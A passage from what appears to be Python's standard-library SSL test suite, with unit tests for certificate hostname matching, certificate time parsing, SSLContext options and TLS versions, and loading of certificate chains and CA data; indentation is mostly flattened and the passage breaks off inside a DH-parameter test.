cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
        # a wildcard in the first fragment combined with IDNA A-labels in
        # subsequent fragments is not supported: all of these must fail
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'),
('IP Address', '127.0.0.1'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
# socket.inet_ntoa(socket.inet_aton('127.1')) == '127.0.0.1'
fail(cert, '127.1')
fail(cert, '14.15.16.17 ')
fail(cert, '14.15.16.17 extra data')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if socket_helper.IPV6_ENABLED:
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::baba ')
fail(cert, '2003::baba extra data')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if socket_helper.IPV6_ENABLED:
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.create_server(('127.0.0.1', 0))
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (frozenset, set, bool))
if isinstance(trust, (frozenset, set)):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = socket_helper.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
def test_read_write_zero(self):
# empty reads and writes now work, bpo-42854, bpo-31711
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.send(b""), 0)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.protocol, protocol)
with warnings_helper.check_warnings():
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT |
OP_IGNORE_UNEXPECTED_EOF)
self.assertEqual(default, ctx.options)
with warnings_helper.check_warnings():
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
with warnings_helper.check_warnings():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
def test_verify_mode_protocol(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@ignore_deprecation
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        # The OpenSSL default is MINIMUM_SUPPORTED; however, some vendors
        # (such as Fedora) override the setting to TLS 1.0.
minimum_range = {
# stock OpenSSL
ssl.TLSVersion.MINIMUM_SUPPORTED,
# Fedora 29 uses TLS 1.0 by default
ssl.TLSVersion.TLSv1,
# RHEL 8 uses TLS 1.2 by default
ssl.TLSVersion.TLSv1_2
}
maximum_range = {
# stock OpenSSL
ssl.TLSVersion.MAXIMUM_SUPPORTED,
# Fedora 32 uses TLS 1.3 by default
ssl.TLSVersion.TLSv1_3
}
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertIn(
ctx.maximum_version, maximum_range
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(
hasattr(ssl.SSLContext, 'security_level'),
"requires OpenSSL >= 1.1.0"
)
def test_security_level(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        # The default security callback allows for levels between 0 and 5,
        # with OpenSSL defaulting to 1; however, some vendors override the
        # default value (e.g. Debian defaults to 2).
security_level_range = {
0,
1, # OpenSSL default
2, # Debian
3,
4,
5,
}
self.assertIn(ctx.security_level, security_level_range)
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
ctx.verify_flags = ssl.VERIFY_ALLOW_PROXY_CERTS
self.assertEqual(ctx.verify_flags, ssl.VERIFY_ALLOW_PROXY_CERTS)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
            # Pass a password larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(
ssl.SSLError,
"no start line: cadata does not contain a certificate"
):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(
ssl.SSLError,
"not enough data: cadata does not contain a certificate"
):
ctx.load_verify_locations(cadata=b"broken")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
